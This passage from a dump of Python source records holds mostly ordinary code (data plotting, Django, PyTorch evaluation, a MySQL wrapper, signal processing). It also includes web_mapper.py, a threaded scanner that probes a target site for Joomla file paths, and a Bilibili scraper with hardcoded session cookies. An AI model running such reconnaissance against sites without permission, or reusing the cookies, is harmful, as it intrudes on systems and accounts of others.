times[0]\n\t\t\t\tend_t = times[1]\n\n\t\t\t\tutt = spk + '-' + str(i).zfill(5)\n\t\t\t\tout_vid_file = spk + '/' + utt + '.mp4'\n\n\t\t\t\tutt2spk.write(utt + ' ' + spk + '\\n')\n\t\t\t\tscp.write(utt + ' ' + out_vid_file + '\\n')\n\t\t\t\tsp.Popen(['ffmpeg', '-y', '-i', args.vid,'-ss',beg_t,'-to',end_t,out_vid_file]).wait()\n\t\t\t\tactivation = True\n\t\t\t\ti+=1\n\n\t\t# transcription line\n\t\telif len(line.split()) > 0:\n\t\t\tif activation:\n\t\t\t\ttxt.write(utt + ' ' + line)\n\t\t\t\tactivation = False\n","sub_path":"prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"492557069","text":"from matplotlib import colors as mcolors\nfrom matplotlib import pyplot as pl\nimport pandas as pd\nimport numpy as np\n\n# Colors for plots\ncolors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\ncolors = [j for i, j in colors.items()]\ncolors = iter(colors)\n\ndfjohnson = pd.read_csv('../dmax_johnson/matches.txt')\ndfjohnson['Alloy'] = [\n 'Ni400P100',\n 'Cu250Zr250',\n 'Zr300Cu150Al50'\n ]\n\ndfjohnson.rename(columns={'Alloy': 'composition'}, inplace=True)\ndfjohnson = dfjohnson[['composition', 'dexp (mm)', 'TL (K)']]\ndfjohnson.columns = ['composition', 'dmax', 'tl']\n\ndfward = pd.read_csv('../dmax_ward/matches.txt')\n\n# Composition for 500 atoms\ndfward['composition'] = [\n 'Al0Cu200Zr300',\n 'Ni300Nb200',\n 'Cu250Zr250',\n 'Cu250Zr250',\n 'Al35Cu230Zr235',\n 'Al35Cu225Zr240',\n ]\n\ndftl = pd.read_csv('../tl/tl.txt')\ndftl = dftl.dropna()\n\ndfward = dfward.merge(dftl, on=['composition'])\ndfward = dfward[['composition', 'D_max', 'tl']]\ndfward.columns = ['composition', 'dmax', 'tl']\n\ndf = pd.read_csv('../jobs_data/fragility.txt')\ndf['composition'] = df['job'].apply(lambda x: x.split('_')[1])\n\ndfjohnson = df.merge(dfjohnson, on=['composition'])\ndfward = df.merge(dfward, on=['composition'])\n\ndf = pd.concat([dfjohnson, dfward])\n\n# Gather Tl/T*\ndf['tg/tl'] = df['tg'].values/df['tl'].values\n\n# Take mean values for each composition\ngroups = df.groupby(['composition'])\nmean = groups.mean().add_suffix('_mean').reset_index()\nstd = groups.std().add_suffix('_std').reset_index()\nsem = groups.sem().add_suffix('_sem').reset_index()\ncount = groups.count().add_suffix('_count').reset_index()\n\n# Merge data\ndf = mean.merge(sem)\ndf = df.merge(std)\ndf = df.merge(count)\n\ngroups = df.groupby(['composition'])\n\nfig, ax = pl.subplots()\nfor i, j in groups:\n\n x = j['tg/tl_mean'].values\n y = j['dmax_mean'].values**2\n xstd 
= j['tg/tl_std'].values\n    xsem = j['tg/tl_sem'].values\n\n    ax.errorbar(\n        x,\n        y,\n        xerr=xstd,\n        ecolor='y',\n        marker='8',\n        linestyle='none',\n        )\n\n    ax.errorbar(\n        x,\n        y,\n        xerr=xsem,\n        ecolor='r',\n        marker='8',\n        linestyle='none',\n        color=next(colors),\n        label=i\n        )\n\n\nax.grid()\nax.legend()\n\nax.set_xlabel(r'$T_{g}/T_{l}$')\nax.set_ylabel(r'$D_{max}^{2}$ $[mm^{2}]$')\n\nax.set_yscale('log')\n\nfig.tight_layout()\nfig.savefig('../jobs_plots/dmax_vs_tgovertl')\n\nprint(df)\npl.show()\n","sub_path":"dmax_vs_tgovertl.py","file_name":"dmax_vs_tgovertl.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"351213148","text":"import queue\nimport threading\nimport os\nimport urllib.request\nimport urllib.error\n\nthreads = 10\ntarget = \"http://www.test.com\"\ndirectory = \"/Users//Downloads/joomla3-1.1\"\nfilters = [\".jpg\", \".gif\", \"png\", \".css\"]\n\nos.chdir(directory)\nweb_paths = queue.Queue()\n\nfor r,d,f in os.walk(\".\"):\n    for files in f:\n        remote_path = f\"{r}/{files}\"\n        if remote_path.startswith(\".\"):\n            remote_path = remote_path[1:]\n        if os.path.splitext(files)[1] not in filters:\n            web_paths.put(remote_path)\n\ndef test_remote():\n    while not web_paths.empty(): \n        path = web_paths.get()\n        request = urllib.request.Request(f\"{target}{path}\")\n        try:\n            response = urllib.request.urlopen(request)\n            content = response.read()\n            print(f\"[{response.code}] => {path}\") \n            response.close()\n        except urllib.error.HTTPError as error: \n            print(f\"Failed {error.code}\")\n            pass\n    \nfor i in range(threads): \n    print(f\"Spawning thread: {i}\")\n    t = threading.Thread(target=test_remote)\n    t.start()\n","sub_path":"web_mapper.py","file_name":"web_mapper.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"102019307","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\n\nfrom datetime import datetime\nimport re\n\nfrom users.models import UserActivity\n\ncompiled_lists = {}\n\n\nclass LastActivity(object):\n\n    def process_request(self, request):\n        if not request.user.is_authenticated():\n            return\n        urls_module = __import__(settings.ROOT_URLCONF, {}, {}, [''])\n        skip_list = getattr(urls_module, 'skip_last_activity_date', None)\n        skipped_path = request.path\n        if skipped_path.startswith('/'):\n            skipped_path = skipped_path[1:]\n        if skip_list is not None:\n            for expression in skip_list:\n                compiled_version = None\n                if not compiled_lists.has_key(expression):\n                    compiled_lists[expression] = re.compile(expression)\n                compiled_version = compiled_lists[expression]\n                if compiled_version.search(skipped_path):\n                    return\n        activity = None\n        try:\n            activity = request.user.useractivity\n        except:\n            activity = UserActivity()\n            activity.user = request.user\n        activity.last_activity_date = datetime.now()\n        activity.last_activity_ip = request.META['REMOTE_ADDR']\n        activity.save()\n        activity.last_activity_date = datetime.now()\n        activity.last_activity_ip = request.META['REMOTE_ADDR']\n        activity.save()\n","sub_path":"modules/users/middleware/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"418467321","text":"from django.conf.urls import url\n\n# Import Django authentication views\nfrom django.contrib.auth import views as loginViews\n\nfrom .views import DashboardView\n\nurlpatterns = [\n\n    # login / logout urls\n    
url(r'^login/$',\n        loginViews.login,\n        name='login'),\n\n    url(r'^logout/$',\n        loginViews.logout,\n        name='logout'),\n\n    url(r'^logout-then-login/$',\n        loginViews.logout_then_login,\n        name='logout_then_login'),\n\n    url(r'^dashboard/$',\n    \tDashboardView.as_view(),\n    \tname='dashboard'),\n\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"340708313","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\n\n\ndef open_task(name):\n    \"\"\"\n    Open a window with the task\n    \n    Parameters:\n    name -- file name with extension\n\n    \"\"\" \n    root = tk.Tk()\n\n    # Create the working area\n    frame = tk.Frame(root)\n    frame.grid()\n\n    # Add the image\n    image = Image.open(name)\n    \n    # Get the image size and fit the window to it\n    (width, height) = image.size\n    canvas = tk.Canvas(root, height=height, width=width)\n    \n    photo = ImageTk.PhotoImage(image)\n    image = canvas.create_image(0, 0, anchor='nw',image=photo)\n    canvas.grid(row=2,column=1)\n    \n    # Window title and main loop\n    root.title(\"Task\")\n    root.mainloop()\n","sub_path":"Задание 1/opentaskmodule.py","file_name":"opentaskmodule.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"497895160","text":"import sys\nsys.stdin = open ('5174.txt', 'r')\n\n\ndef find(a):\n    global cnt\n\n    if a:\n        find(tree[a][0])\n        find(tree[a][1])\n        cnt += 1\n\nT = int(input())\n\nfor tc in range(T):\n    e, n = list(map(int, input().split()))\n    data = list(map(int, input().split()))\n\n    m = max(data)\n\n    tree = [[0] * 2 for _ in range(m+1)]\n\n\n    for i in range(len(data) // 2):\n        parent, child = data[i * 2], data[i * 2 + 1]\n        if not tree[parent][0]:\n            tree[parent][0] = child\n        else:\n            tree[parent][1] = child\n\n    cnt = 0\n    find(n)\n\n\n    print('#{} {}' .format(tc+1, cnt))\n\n","sub_path":"Algorithm/190910/5174_subtree.py","file_name":"5174_subtree.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"410226382","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Han\"\n__email__ = \"liuhan132@foxmail.com\"\n\n\nimport argparse\nfrom tqdm import tqdm\nimport torch\nimport torch.nn\nimport torch.multiprocessing\nimport logging\nfrom game.dataset_reader import DocPTReader\nfrom utils.functions import set_seed\nfrom utils.config import init_logging, read_config\nfrom game.dataset_reader import load_docs_rep\n\nlogger = logging.getLogger(__name__)\n\n\ndef main(config_path, out_infix, slot):\n    logger.info('loading config file...')\n    game_config = read_config(config_path, out_infix)\n\n    # set multi-processing: bugs in `list(dataloader)`\n    # see more on `https://github.com/pytorch/pytorch/issues/973`\n    torch.multiprocessing.set_sharing_strategy('file_system')\n\n    # set random seed\n    set_seed(game_config['global']['random_seed'])\n\n    logger.info('reading dataset...')\n    dataset = DocPTReader(game_config)\n\n    # training arguments\n    batch_size = 1\n    num_workers = 5\n    test_iters = 500\n\n    # dataset loader\n    batch_test_data = dataset.get_dataset_test_slot(slot, batch_size, num_workers, test_iters)\n    docs_name = dataset.doc_reader.get_all_names()\n\n    logger.info('start testing...')\n\n    with torch.no_grad():\n        test_mrr = eval_on_rep(docs_name, batch_test_data)\n        logger.info(\"test_all_mrr=%.2f%%\" % test_mrr)\n    
logger.info('finished.')\n\n\ndef eval_on_rep(docs_name, dataloader):\n    docs_rep = load_docs_rep('data/doc_rep/pt/dialog_doc_pt_rep.pt')\n\n    mrr = []\n\n    for batch in tqdm(dataloader, desc='Testing...'):\n        _, _, batch_ground_truth_idx, batch_cand_doc_names = batch\n        ground_truth_idx = batch_ground_truth_idx[0].item()\n        cand_doc_names = batch_cand_doc_names[0]\n\n        cand_idx = [docs_name.index(name) for name in cand_doc_names]\n        tar_idx = cand_idx[ground_truth_idx]\n\n        cand_docs_rep = docs_rep[cand_idx, 0, 400:]\n        tar_rep = docs_rep[tar_idx, 0, :400]\n\n        cand_prob = torch.mm(tar_rep.unsqueeze(0), cand_docs_rep.transpose(0, 1)).squeeze(0)\n        cand_prob_softmax = torch.softmax(cand_prob, dim=-1)\n\n        sort_prob, sort_idx = torch.sort(cand_prob_softmax, dim=-1, descending=True)\n        cur_mrr = 1.0 / (sort_idx.tolist().index(ground_truth_idx) + 1)\n        mrr.append(cur_mrr)\n\n    return sum(mrr) * 1.0 / len(mrr)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--out', type=str, default='default', help='output path infix')\n    parser.add_argument('--slot', type=str, default='directed_by', help='output path infix')\n    args = parser.parse_args()\n\n    out_infix = args.out\n\n    init_logging(out_infix=out_infix)\n    main('config/game_config.yaml', out_infix=out_infix, slot=args.slot)","sub_path":"tests/test_docs_rep.py","file_name":"test_docs_rep.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"619054490","text":"import time\n\nclass TimeModel:\n    def __init__(self):\n        self.days = [\"Maandag\", \"Dinsdag\", \"Woensdag\", \"Donderdag\", \"Vrijdag\", \"Zaterdag\", \"Zondag\"]\n        self.months = [\"januari\", \"februari\", \"maart\", \"april\", \"mei\", \"juni\", \"juli\", \"augustus\", \"september\", \"oktober\", \"november\", \"december\"]\n\n    def get_current_second(self):\n        t = time.time()\n        local = str(time.localtime(t).tm_sec)\n        if(len(local) == 1):\n            local = \"0\" + local\n\n        return local\n\n    def get_current_date(self):\n        t = time.time()\n        local = time.localtime(t)\n        return self.days[local.tm_wday] + \", \" + str(local.tm_mday) + \" \" + self.months[local.tm_mon - 1] + \" \" + str(local.tm_year)\n\n    def get_current_time(self):\n        t = time.time()\n        local = time.localtime(t)\n        hour = str(local.tm_hour)\n        minute = str(local.tm_min)\n\n        if(len(hour) == 1):\n            hour = \"0\" + hour\n\n        if(len(minute) == 1):\n            minute = \"0\" + minute\n\n        return hour + \":\" + minute\n\n    def get_temperature(self):\n        # Note: relies on the Adafruit_DHT library and a self.sensor attribute,\n        # neither of which is set up in this module.\n        humidity, temperature = Adafruit_DHT.read(self.sensor, 4)\n        return temperature","sub_path":"bin/models/timemodel.py","file_name":"timemodel.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"383700419","text":"import mysql.connector\nfrom mysql.connector.errors import Error\n\n\nclass MySQL:\n    def __init__(self, db_config):\n        self.db_config = db_config\n\n    def create_connection(self):\n        try:\n            self.conn = mysql.connector.connect(**self.db_config)\n            self.cursor = self.conn.cursor(dictionary=True)\n        except Error as e:\n            print(e)\n    \n        return self.cursor\n    \n    def query(self, *args):\n        try:\n            self.cursor.execute(*args)\n        except Error as e:\n            print(e)\n        self.commit()\n        self.close()\n\n    def select(self, *args):\n        try:\n            self.cursor.execute(*args)\n            res = self.cursor.fetchall()\n            self.close()\n            \n            return res\n        except Error as e:\n            print(e)\n            self.close()\n\n    def commit(self):\n        self.conn.commit()\n\n    def 
close(self):\n self.cursor.close()\n self.conn.close()","sub_path":"taxi-react-v2/server/mysql_wrapper.py","file_name":"mysql_wrapper.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"141209028","text":"from atlas_client.http.http_resource import HttpResource\nfrom atlas_client.resources.organizations.programmatic_api_keys.programmatic_api_keys import ProgrammaticAPIKeysResource\n\n\nclass _SingleOrganizationResource(HttpResource):\n def programmatic_api_keys(self) -> ProgrammaticAPIKeysResource:\n path = \"apiKeys\"\n return self.context.sub_resource(_class=ProgrammaticAPIKeysResource, path=path)\n\n def get(self) -> dict:\n response = self.context.request(method=\"GET\")\n response.raise_for_status()\n return response.json()\n\n def update(self, new_name: str) -> dict:\n _json = {\n \"name\": new_name\n }\n response = self.context.request(method=\"PATCH\",\n json=_json)\n response.raise_for_status()\n return response.json()\n\n def delete(self) -> None:\n response = self.context.request(method=\"DELETE\")\n response.raise_for_status()\n\n\nclass OrganizationResource(HttpResource):\n def with_id(self, org_id: str) -> _SingleOrganizationResource:\n path = org_id\n return self.context.sub_resource(_class=_SingleOrganizationResource, path=path)\n\n def get(self) -> dict:\n response = self.context.request(method=\"GET\")\n response.raise_for_status()\n return response.json()\n\n def create(self, name: str) -> dict:\n _json = {\n \"name\": name\n }\n response = self.context.request(method=\"POST\",\n json=_json)\n response.raise_for_status()\n return response.json()\n","sub_path":"atlas/src/atlas_client/resources/organizations/organizations.py","file_name":"organizations.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"347539679","text":"from rest_framework.permissions import DjangoModelPermissions, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import ModelSerializer\nfrom rest_framework.views import APIView\n\nfrom curation_portal.models import Project\n\n\nclass ProjectSerializer(ModelSerializer):\n class Meta:\n model = Project\n fields = (\"id\", \"name\")\n\n\nclass CreateProjectView(APIView):\n permission_classes = (IsAuthenticated, DjangoModelPermissions)\n\n queryset = Project.objects.none() # required for DjangoModelPermissions\n\n def post(self, request):\n serializer = ProjectSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n project = serializer.save(created_by=request.user)\n project.owners.set([request.user])\n return Response(serializer.data)\n","sub_path":"curation_portal/views/project_admin.py","file_name":"project_admin.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"382074032","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport scipy.signal as signal\nimport scipy.io.wavfile as wav\nfrom scipy.fftpack import fft, ifft\nfrom scipy.ndimage.interpolation import shift\n\n# Reading signal\nFs, sound = wav.read('xuhric00.wav')\n\nprint('Sampling frequency: %d Hz' %Fs)\nprint('Length: %d samples' %sound.size)\nprint('Length: %d s' %(sound.size/Fs))\n\n# Fourier transformation of wav signal\ndft = fft(sound)\n\n# Getting modules\nmoduls = np.absolute(dft)\n\n# 
Plotting\nplt.plot(moduls[:(Fs//2)])\nplt.xlabel('f [Hz]')\nplt.ylabel('|X(x)|')\nplt.show()\n\n# Finding maximum\nprint('Maximum is on frequency: %d Hz' %np.argmax(moduls))\n\n# b and a values of filter\na = [1., 0.2289, 0.4662]\nb = [0.2324, -0.4112, 0.2324]\n\n# Finding zeroes and poles of the filter\nzeroes, poles, _ = signal.tf2zpk(b, a)\n\n# Plotting zeroes and poles\nplt.scatter(zeroes.real, zeroes.imag, marker='o', label='zeroes')\nplt.scatter(poles.real, poles.imag, marker='x', label='poles')\nplt.gca().add_patch(plt.Circle((0,0), radius=1., color='lightsteelblue', fc='none'))\nplt.axis('scaled')\nplt.legend(scatterpoints=1)\nplt.xlabel('real part')\nplt.ylabel('imaginary part')\nplt.show()\n\n# Finding impuls response of a filter and normed frequency\nnormf, freqresponse = signal.freqz(b, a)\n\n# Calculating absolute frequency\nf = Fs * normf / (2*np.pi)\n\n# Plotting \nplt.plot(f, np.abs(freqresponse))\nplt.xlabel('f [Hz]')\nplt.ylabel('|H(z)|')\nplt.show()\n\n# Filtering our signal\ny = signal.lfilter(b, a, sound)\n\n# Fourier transformation over filtered signal\ndft = fft(y)\n\n# Getting modules\nmoduls = np.absolute(dft)\n\n# Plotting\nplt.plot(moduls[:(Fs//2)])\nplt.xlabel('f [Hz]')\nplt.ylabel('|Y(x)|')\nplt.show()\n\n# Finding maximum \nprint('Maximum is on frequency: %d Hz' %np.argmax(moduls))\n\n# Finding autocorrelated coefficients\nr = np.array([])\n\nfor k in range(-50, 51):\n r = np.append(r, np.sum((sound/sound.size)*shift(sound, k, cval = 0)))\n\nplt.plot(r)\nplt.show()\n\nprint('Value of coefficient R[10] = %.2f' %r[60])\n\n# Creating histogram\nhist, xedges, yedges = np.histogram2d(sound, shift(sound, 10, cval=0),\n 32, normed=True,\n range=[[-Fs, Fs], [-Fs, Fs]])\n\nplt.imshow(hist, interpolation='nearest', origin='low',\n extent=[xedges[0], xedges[-1], yedges[0], yedges[-1]])\nplt.colorbar()\n\nplt.show()\n\n# Check that integral equals 1\nsquareSize = (xedges[1]-xedges[0])*(yedges[1]-yedges[0])\nintegral = squareSize * np.sum(hist)\nprint('Total volume of 2D histogram: %.2f' %integral)\n\n# Finding autocorrelated coefficient\nx = np.linspace(-16000, 16000, num=32)\nx = np.tile(x, (32, 1))\nr = np.sum(x * x.transpose() * hist) * squareSize\nprint('Histogram calculated R[10] = %.2f' %r)\n","sub_path":"2BIT/ISS/xuhric00.py","file_name":"xuhric00.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"102922584","text":"from enroll.categoryPush import CategoryPush\nfrom browser.chrome import Chrome\n\n\n# 역시 이름이 맘에 안 들지만,\n# is_p 가 True 면 사이트에서 얻은 카테고리 정보를 csv파일로 저장하는 메소드(push_2_csv())를 호출하고,\n# False면 csv파일을 읽어 category, history table 을 채우는 메소드 호출한다.\ndef do_using_csv(is_p_2_csv):\n c = CategoryPush(url, ch, name)\n if is_p_2_csv:\n c.push_2_csv()\n else:\n c.push_2_db()\n return\n\n\n# 위의 push_2_csv()메소드를 수행하기 전에, 콘솔 창으로 확인하는 메소드. 카테고리 정보를 csv로 저장하냐, 콘솔창을 확인하냐의 차이만 있다.\ndef test_in_console():\n # 크롬 창을 최대화\n ch.driver.maximize_window()\n try:\n c = CategoryPush(url, ch, name)\n print(c.site_id)\n\n # 이 패키지 전체에서 핵심이 되는 메소드. 자세한 설명은 categoryPush.py 에서\n c.drive_next_cate('', '', 1)\n\n # 콘솔창으로 결과를 출력\n print('-'*50)\n # 카테고리의 이름들. 
ex) outer>jumper, women>top>반팔 등\n for n in c.cate_names:\n print(n)\n print('-'*50)\n # 카테고리의 url 출력\n for u in c.urls:\n print(u)\n finally:\n ch.driver.close()\n return\n\n\n# [전체과정]\n# 크롬 브라우저를 실행\nch = Chrome()\n\n# 원하는 사이트의 url과 이름을 입력\nurl = 'https://daltt.co.kr/'\nname = 'daltt'\n\n# 해당 사이트로 브라우저 이동\nch.move(url)\n\ntry:\n # test_in_console()\n is_2_csv = False\n # do_using_csv 에 관한 설명은 위에서 했으니 생략\n do_using_csv(is_2_csv)\nfinally:\n ch.driver.close()\n pass\n\n# url = 'https://daltt.co.kr/'\n# name = 'daltt'\n# url = 'https://store-kr.uniqlo.com/'\n# name = 'uniqlo'\n# url = 'http://leehee.co.kr/'\n# name = 'leehee'\n# url = 'https://store.musinsa.com/app/'\n# name = 'musinsa'\n\n\n\n\n\n\n","sub_path":"common/enroll/enrollSite.py","file_name":"enrollSite.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"112346092","text":"#!/usr/bin/python3\n\"\"\"\n 6-square.py\n Module that defines a Square and return square size and coordinates\n Including Getters and Setters\n Including Method to calculate the Square's area\n Including Method to print the Square based on coordinates\n\"\"\"\n\n\nclass Square:\n \"\"\"\n Represents a class called Square with:\n private instance attribute called size\n private instance attribute called position\n \"\"\"\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"Initialization of the private instance attributes\"\"\"\n self.size = size\n self.position = position\n\n @property\n def size(self):\n \"\"\"Getter property to get the size of the Square\"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"Set the size of the Square\n\n Args:\n value (int): New size of the Square\n\n Note:\n If size is not an integer, a TypeError exception is raised\n Else If size is negative, a ValueError exception is raised\n Otherwise, Successful Set\n \"\"\"\n if type(value) == int:\n if value < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = value\n else:\n raise TypeError(\"size must be an integer\")\n\n @property\n def position(self):\n \"\"\"Getter property to get the coordinates of the Square\"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"Set the coordinates of the Square\n\n Args:\n value (tuple): New coordinates of the Square\n\n Note:\n If position contains more than 2 elements, a TypeError\n exception is raised\n Else If one of the position elements is negative, a TypeError\n exception is raised\n Else if one of the position elements is not integer, a TypeError\n exception is raised\n Otherwise, Successful Set\n \"\"\"\n if not isinstance(value, tuple) or len(value) != 2:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif any(not isinstance(num, int) for num in value):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif any(num < 0 for num in value):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n else:\n self.__position = value\n\n def area(self):\n \"\"\"Function that returns the area of the square\"\"\"\n return self.__size ** 2\n\n def my_print(self):\n \"\"\"Function that prints the square based on coordinates\n\n Note:\n If size is zero, print empty line\n Otherwise:\n print matrix with # character of same Square's size\n with leading spaces based on coordinates\n \"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__position[1]):\n print()\n for i in range(self.__size):\n for 
j in range(self.__position[0]):\n                    print(\" \", end=\"\")\n                for k in range(self.__size):\n                    print(\"#\", end=\"\")\n                print()\n","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"169713398","text":"import requests\nimport re\nimport time\nimport json\n\n\nclass BlilibliliSpider(object):\n    def __init__(self):\n        self.headers={\n            \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n            # \"accept-encoding\": \"gzip, deflate, br\",\n            \"accept-language\": \"zh-CN,zh;q=0.9\",\n            \"cache-control\": \"max-age=0\",\n            \"cookie\": \"fingerprint=bd1b6509a35f4e22e5bf2537271fbea9; buvid_fp=CD574209-D446-429D-911C-CDAF4D8A458E143111infoc; buvid_fp_plain=C072413D-321F-4708-A6EC-49A7372D080B185000infoc; CURRENT_FNVAL=80; _uuid=8F83D8E1-5AA8-52A8-E681-ABB6DCE25A2C47038infoc; buvid3=CD574209-D446-429D-911C-CDAF4D8A458E143111infoc; blackside_state=1; rpdid=|(umR~lmRlkm0J'uY|JYmk)l); LIVE_BUVID=AUTO1216146669857273; CURRENT_QUALITY=64; fingerprint=bd1b6509a35f4e22e5bf2537271fbea9; buvid_fp=CD574209-D446-429D-911C-CDAF4D8A458E143111infoc; buvid_fp_plain=C072413D-321F-4708-A6EC-49A7372D080B185000infoc; sid=jz5uhvmb; PVID=2\",\n            \"sec-fetch-dest\": \"document\",\n            \"sec-fetch-mode\": \"navigate\",\n            \"sec-fetch-site\": \"none\",\n            \"sec-fetch-user\": \"?1\",\n            \"referer\": \"https://www.bilibili.com/video/BV1SK4y1m7Ct\",\n            \"upgrade-insecure-requests\": \"1\",\n            \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\"\n        }\n        self.filename='/home/tarena/bliliblili'\n        self.url='https://api.bilibili.com/x/web-interface/popular?ps=20&pn={}'\n    def parse_one_page(self):\n        for pn in range(1,3):\n            url=self.url.format(pn)\n            # url='https://api.bilibili.com/x/web-interface/popular?ps=20&pn=2'\n            data=requests.get(url=url,headers=self.headers).text\n            # data.decode('utf8')\n\n            print(data)\n            data = json.loads(data)['data']['list']\n\n            L={}\n            for info in data:\n                L['title']=info['title']\n                L['bvid']=info['bvid']\n                L['tname']=info['tname']\n                print(L)\n                self.parse_two_page(L['bvid'],L['title'])\n                time.sleep(6)\n\n    def parse_two_page(self,bvid,title):\n        url='https://www.bilibili.com/video/'+bvid\n        html=requests.get(url=url,headers=self.headers).text\n        bds = 'window.__playinfo__=(.*?)</script>'\n        pattern = re.compile(bds, re.S)\n        data = pattern.findall(html)[0]\n        data = json.loads(data)\n        data=data['data']['dash']['audio'][0]\n        video_url=data['base_url']\n        voice_url=data['backup_url'][0]\n        print(video_url)\n        print(voice_url)\n\n\n        # self.save_data(video_url,voice_url,title)\n\n    def save_data(self,video_url,voice_url,title):\n        video=requests.get(url=video_url,headers=self.headers).content\n        with open(self.filename+title+'.mp4','wb')as f:\n            print(video)\n            f.write(video)\n            print('Video download finished')\n        video=requests.get(url=voice_url,headers=self.headers).content\n        # html=video.decode('utf8')\n        with open(self.filename+title+'.mp3','wb')as f:\n            f.write(video)\n            print('Audio download finished')\n\n\n\n\n\n    def main(self):\n        self.parse_one_page()\n\nif __name__ == '__main__':\n    spider=BlilibliliSpider()\n    spider.main()","sub_path":"bliliblili_spider.py","file_name":"bliliblili_spider.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 
+{"seq_id":"633103919","text":"#!/usr/bin/env python\n\nimport rospy\nfrom mongodb_store.message_store import MessageStoreProxy\nfrom bayes_people_tracker.msg import PeopleTracker\nfrom mdl_people_tracker.msg import MdlPeopleTrackerArray, MdlPeopleTracker\nfrom upper_body_detector.msg import UpperBodyDetector\nfrom bayes_people_tracker_logging.msg import Logging\nimport geometry_msgs.msg\nimport message_filters\nfrom camera_calibration.approxsync import ApproximateSynchronizer\nimport tf\n\n\nclass SaveLocations():\n def __init__(self):\n rospy.logdebug(\"Intialising logging\")\n self.robot_pose = geometry_msgs.msg.Pose()\n self.tfl = tf.TransformListener()\n self.dataset_name = \"locations\"\n self.msg_store = MessageStoreProxy(collection=\"people_perception\")\n locations = message_filters.Subscriber(\n \"/people_tracker/positions\",\n PeopleTracker,\n )\n people = message_filters.Subscriber(\n \"/mdl_people_tracker/people_array\",\n MdlPeopleTrackerArray,\n )\n upper = message_filters.Subscriber(\n \"/upper_body_detector/detections\",\n UpperBodyDetector,\n )\n rospy.Subscriber(\n \"/robot_pose\",\n geometry_msgs.msg.Pose,\n self.pose_callback,\n None,\n 10\n )\n ts = ApproximateSynchronizer(\n 0.5,\n [locations, people, upper],\n 10\n )\n ts.registerCallback(self.people_callback)\n\n def transform(self, source_frame, target_frame, time):\n rospy.logdebug(\n \"Looking up transform: %s -> %s\",\n source_frame,\n target_frame\n )\n transform = geometry_msgs.msg.Transform()\n if self.tfl.frameExists(source_frame[1:]) \\\n and self.tfl.frameExists(target_frame[1:]):\n try:\n self.tfl.waitForTransform(\n target_frame,\n source_frame,\n time,\n rospy.Duration(0.1)\n )\n translation, rotation = self.tfl.lookupTransform(\n target_frame,\n source_frame,\n time\n )\n transform.translation.x = translation[0]\n transform.translation.y = translation[1]\n transform.translation.z = translation[2]\n transform.rotation.x = rotation[0]\n transform.rotation.y = rotation[1]\n transform.rotation.z = rotation[2]\n transform.rotation.w = rotation[3]\n except (\n tf.Exception,\n tf.ConnectivityException,\n tf.LookupException,\n tf.ExtrapolationException\n ) as e:\n rospy.logwarn(e)\n return transform\n\n def people_callback(self, pl, pt, up):\n if len(pl.distances) == 0:\n return\n meta = {}\n meta[\"people\"] = self.dataset_name\n 